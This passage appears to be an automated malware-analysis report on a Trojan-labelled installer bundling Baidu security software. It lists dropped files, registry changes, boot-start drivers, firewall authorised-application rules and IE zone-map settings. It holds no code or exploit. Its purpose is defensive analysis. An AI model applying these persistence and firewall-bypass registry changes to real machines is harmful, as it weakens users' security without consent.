%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.3.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\placeholder_tmp (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\bd0002.sys (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMUpdate.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_customer.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\cache_config.dat (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\wverify.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu16.tmp (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMFrameWork.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\ns19.tmp (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMReport.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\skin_engine.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.1.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.5.xml (0 bytes)

The process %original file name%.exe:716 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

The Trojan deletes the following file(s):

The process BaiduSdTray.exe:2844 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings% (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1\LOG (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd (4 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086 (288 bytes)
%WinDir%\SoftwareDistribution\DataStore\Logs (96 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\902.dat (4 bytes)
%WinDir%\repair (4 bytes)
%Documents and Settings%\All Users\APPLICATION DATA (4 bytes)
%Program Files%\WIRESHARK (192 bytes)
%WinDir%\WinSxS (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (632 bytes)
%WinDir%\SoftwareDistribution (4 bytes)
%WinDir%\$hf_mig$ (96 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\900.dat (12 bytes)
%WinDir%\WinSxS\Manifests (1444 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wireshark.txt (12074 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\LOG (4 bytes)
%WinDir%\Help (248 bytes)
%WinDir%\ime (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1 (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB\LOG (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch (4 bytes)
%WinDir%\Prefetch\NETSH.EXE-085CFFDE.pf (24 bytes)
%Documents and Settings%\All Users (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp (4 bytes)
%WinDir% (1060 bytes)
%Documents and Settings%\All Users\Documents\My Music (4 bytes)
C:\$Directory (1388 bytes)
%System% (552 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\BaiduSdCache.rptc (102 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319 (1440 bytes)
%WinDir%\Microsoft.NET\Framework\V2.0.50727 (1444 bytes)
%WinDir%\Fonts (4 bytes)
%System%\config\systemprofile (4 bytes)
%Program Files%\COMMON FILES (4 bytes)
C:\ (4 bytes)
%Documents and Settings%\All Users\Start Menu\Programs (4 bytes)
%System%\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} (4 bytes)
%Program Files% (8 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667 (12 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB (4 bytes)
%Documents and Settings%\%current user% (4 bytes)
%WinDir%\Prefetch\REGSVR32.EXE-25EEFE2F.pf (48 bytes)
%Documents and Settings%\%current user%\APPLICATION DATA (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips (4 bytes)
%WinDir%\pchealth\helpctr (4 bytes)
%System%\drivers (4 bytes)
%Documents and Settings%\All Users\Start Menu (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\000003.log (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\G1023_s_70904[1].exe (1040 bytes)
%Program Files%\Adobe\Reader 9.0 (4 bytes)
%WinDir%\Prefetch (192 bytes)
%System%\wbem\Logs\wbemcore.log (576 bytes)
C:\totalcmd (4 bytes)
%System%\CatRoot2 (96 bytes)
%System%\wbem\Repository\FS\INDEX.BTR (608 bytes)
%Program Files%\Common Files\VMware\Drivers (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\LOG (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\G1023_s_70904.exe (17531 bytes)
%WinDir%\MICROSOFT.NET (4 bytes)
%Program Files%\Adobe\Reader 9.0\Reader (192 bytes)
%WinDir%\Microsoft.NET\Framework (96 bytes)
%WinDir%\assembly (4 bytes)
%Documents and Settings%\Default User (56 bytes)
%System%\oobe (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1 (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\000003.log (4 bytes)
%Documents and Settings%\LocalService (4 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\BaiduSdCache.rptc (0 bytes)

The process setup.exe:1056 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-LEFTL.tmp\setup.tmp (3779 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-LEFTL.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-LEFTL.tmp\setup.tmp (0 bytes)

The process BindEx.exe:1568 makes changes in the file system.
The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Desktop\百度卫士.lnk (0 bytes)
%Documents and Settings%\All Users\Desktop\百度杀毒.lnk (0 bytes)

The process BindEx.exe:1040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\G1023_s_70904[1].exe (5514955 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F1023_s_30803.exe (4443178 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\test[1].txt (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dlinstlit.txt (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\F1023_s_30803[1].exe (4700638 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\G1023_s_70904.exe (4688535 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)

The process setup.tmp:1976 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\baidu\is-39O9G.tmp (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-CCSRF.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\baidu\unins000.dat (932 bytes)
%Program Files%\baidu\is-RG24O.tmp (25913 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\baidu\baidu.lnk (479 bytes)
%Program Files%\baidu\BindEx.ini (65 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-CCSRF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-CCSRF.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-CCSRF.tmp\_isetup (0 bytes)

The process BDALeakfixer.exe:3188 makes changes in the file system.
The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\BaiduAnCache.rptc (0 bytes)

The process BaiduAn.exe:3824 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Desktop\百度卫士-软件管理.lnk (866 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度卫士\百度卫士-软件管理.lnk (878 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\SWManager\百度卫士-软件管理.lnk (882 bytes)

The process BaiduAnSvc.exe:3664 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\config\system (4180 bytes)
%System%\config\software (3256 bytes)
%System%\config\SOFTWARE.LOG (4483 bytes)
%System%\drivers\BDEnhanceBoost.sys (61 bytes)
%System%\config (400 bytes)
%System%\config\SYSTEM.LOG (9458 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\MANIFEST-000002 (4 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\CURRENT (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\MANIFEST-000001 (0 bytes)

The process BaiduSdSvc.exe:1500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB\MANIFEST-000002 (4 bytes)
%System%\config\SYSTEM.LOG (13860 bytes)
%System%\config\software (28594 bytes)
%System%\config\SOFTWARE.LOG (29161 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\IsolationDB.db-journal (532 bytes)
%System%\drivers\BDMWrench.sys (1882 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\privacy.db-journal (532 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\BaiduSdCache.rptc (2412 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\white_list.db (145 bytes)
%System%\config (976 bytes)
%System%\config\system (6592 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1\MANIFEST-000002 (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\privacy.db (149 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\IsolationDB.db (149 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\white_list.db-journal (512 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB\MANIFEST-000001 (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB\CURRENT (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\BaiduSdCache.rptc (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\IsolationDB.db-journal (0 bytes)
%System%\drivers\BDMWrench.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\privacy.db-journal (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDMWrench.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1\CURRENT (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1\MANIFEST-000001 (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\white_list.db-journal (0 bytes)

Registry activity

The process F1023_s_30803.exe:780 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Baidu\BaiduSd]
"InstallDate" = "2014-11-6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度杀毒]
"UninstallString" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\uninst.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"Version" = "2.1.0.3086"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度杀毒]
"DisplayVersion" = "2.1.0.3086"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\iexplore\AllowedDomains\*]
"(Default)" = ""

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"vendor" = "Beijing baidu Netcom science and technology co.ltd"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Description" = "百度杀毒功能组件"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度杀毒]
"Publisher" = "百度在线网络技术(北京)有限公司"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Type" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Tag" = "2"

[HKLM\System\CurrentControlSet\Services\bd0003\Instances\bd0003 Instance]
"Altitude" = "326912"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Tag" = "4"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\BDMSkin.dll,"

[HKLM\System\CurrentControlSet\Services\bd0002]
"InstallDir_hips" = "%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"ErrorControl" = "0"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Group" = "FSFilter Anti-Virus"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Description" = "BDArKit"

[HKLM\SOFTWARE\Baidu\BaiduHips]
"Version" = "1.0.0.667"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Type" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin\MimeTypes\application/np-BaiduSDDetect]
"Description" = "BaidusdDetectNPPlugin"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\System\CurrentControlSet\Services\bd0003\Instances]
"DefaultInstance" = "bd0003 Instance"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"InstallDir" = "%Program Files%\Baidu\BaiduSd"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 A6 F1 79 C5 C6 86 18 7C 1E 55 46 42 4F 3A 82"

[HKLM\System\CurrentControlSet\Services\bd0001]
"DisplayName" = "bd0001"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\bd0003]
"DependOnService" = "FltMgr"

[HKLM\System\CurrentControlSet\Services\BaiduHips]
"Tag" = "1"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Common Files\Baidu\BDDownload\108]
"bddownloader.exe" = "百度高速下载引擎"

[HKLM\SOFTWARE\Baidu\BaiduHips]
"InstallPath" = "%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHips.exe"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Group" = "bddriver"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\BaiduHips]
"Group" = "bdsvcorder"

[HKLM\System\CurrentControlSet\Services\bd0003]
"ImagePath" = "system32\DRIVERS\bd0003.sys"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Tag" = "1"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"ImagePath" = "system32\DRIVERS\BDArKit.sys"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bdsvcorder" = "04 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00"

[HKLM\System\CurrentControlSet\Services\bd0002]
"DisplayName" = "bd0002"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Type" = "2"

[HKLM\System\CurrentControlSet\Services\bd0002]
"ErrorControl" = "0"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"RtpFlag" = "273"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Group" = "bddriver"

[HKLM\System\CurrentControlSet\Services\bd0001]
"ImagePath" = "system32\DRIVERS\bd0001.sys"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度杀毒]
"DisplayIcon" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\app.ico"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Tag" = "3"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"Path" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\explugin\npBaiduSDDetectPlug.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度杀毒]
"DisplayName" = "百度杀毒2.1"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"VirusTime" = "2013.11.28 0110"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\bd0001]
"ErrorControl" = "0"

[HKLM\SOFTWARE\Baidu\BaiduHips]
"InstallDir" = "%Program Files%\Common Files\Baidu\BaiduHips"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Description" = "bd0002"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Type" = "1"

[HKLM\System\CurrentControlSet\Services\bd0003]
"ErrorControl" = "1"

[HKLM\System\CurrentControlSet\Services\bd0002]
"ImagePath" = "system32\DRIVERS\bd0002.sys"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"INSTLANG" = "2052"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"ProductName" = "BaiduSd"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"DisplayName" = "BDArKit"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"Description" = "Baidusd detect NPAPI plugin"

[HKLM\System\CurrentControlSet\Control\ServiceGroupOrder]
"List" = "System Reserved, Boot Bus Extender, System Bus Extender, SCSI miniport, Port, Primary Disk, SCSI Class, SCSI CDROM Class, FSFilter Infrastructure, FSFilter System, FSFilter Bottom, FSFilter Copy Protection, FSFilter Security Enhancer, FSFilter Open File, FSFilter Physical Quota Management, FSFilter Encryption, FSFilter Compression, FSFilter HSM, FSFilter Cluster File System, FSFilter System Recovery, FSFilter Quota Management, FSFilter Content Screener, FSFilter Continuous Backup, FSFilter Replication, bddriver, FSFilter Anti-Virus, FSFilter Undelete, FSFilter Activity Monitor, FSFilter Top, Filter, Boot File System, Base, Pointer Port, Keyboard Port, Pointer Class, Keyboard Class, Video Init, Video, Video Save, File System, Event Log, Streams Drivers, NDIS Wrapper, COM Infrastructure, UIGroup, LocalValidation, PlugPlay, PNP_TDI, NDIS, TDI, NetBIOSGroup, ShellSvcGroup, SchedulerGroup, SpoolerGroup, AudioGroup, SmartCardGroup, NetworkProvider, RemoteValidation, NetDDEGroup, Parallel arbitrator, Extended Base, PCI Configuration, MS Transactions"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Description" = "bd0001"

"Group" = "bddriver"

[HKLM\System\CurrentControlSet\Services\bd0003\Instances\bd0003 Instance]
"Flags" = "0"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"Version" = "1.0.0.1"

[HKLM\System\CurrentControlSet\Services\bd0003]
"DisplayName" = "bd0003"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"SupplyID" = "30803"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdBugRpt.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdBugRpt.exe:*:Enabled:百度杀毒BUG上报程序"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Common Files\Baidu\BDDownload\108]
"bddownloader.exe" = "%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe:*:Enabled:百度高速下载器"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\bd0003]
"Start" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdBugRpt.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdBugRpt.exe:*:Enabled:百度杀毒BUG上报程序"

"BaiduSd.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSd.exe:*:Enabled:百度杀毒主程序"

"BaiduSdTray.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe:*:Enabled:百度杀毒托盘程序"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdTray.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe:*:Enabled:百度杀毒托盘程序"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\Common Files\Baidu\BDDownload\108]
"bddownloader.exe" = "%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe:*:Enabled:百度高速下载器"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdSvc.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdSvc.exe:*:Enabled:百度杀毒服务程序"

The following service will be launched automatically at system boot up:

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Start" = "2"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdUpdate.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdUpdate.exe:*:Enabled:百度杀毒更新程序"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\bd0002]
"Start" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\bd0001]
"Start" = "1"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdUpdate.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdUpdate.exe:*:Enabled:百度杀毒更新程序"

"BaiduSd.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSd.exe:*:Enabled:百度杀毒主程序"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdSvc.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdSvc.exe:*:Enabled:百度杀毒服务程序"

The Trojan deletes the following value(s) in system registry:

[HKLM\System\CurrentControlSet\Services\bd0003]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\bd0002]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\bd0001]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"DeleteFlag"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"RtpFlag"

The process BaiduHips.exe:3260 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Services\bd0002]
"Description" = "bd0002"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Type" = "1"
"ImagePath" = "system32\DRIVERS\bd0002.sys"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Tag" = "1"
[HKLM\System\CurrentControlSet\Services\bd0002]
"DisplayName" = "bd0002"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Type" = "1"

[HKLM\System\CurrentControlSet\Services\bd0002]
"ErrorControl" = "0"
"Group" = "bddriver"
"Tag" = "2"

[HKLM\System\CurrentControlSet\Services\bd0001]
"ImagePath" = "system32\DRIVERS\bd0001.sys"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 42 BA 68 E6 D6 5D 88 94 D2 31 53 4B F7 B6 49"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Group" = "bddriver"
"DisplayName" = "bd0001"

[HKLM\System\CurrentControlSet\Control\Session Manager]
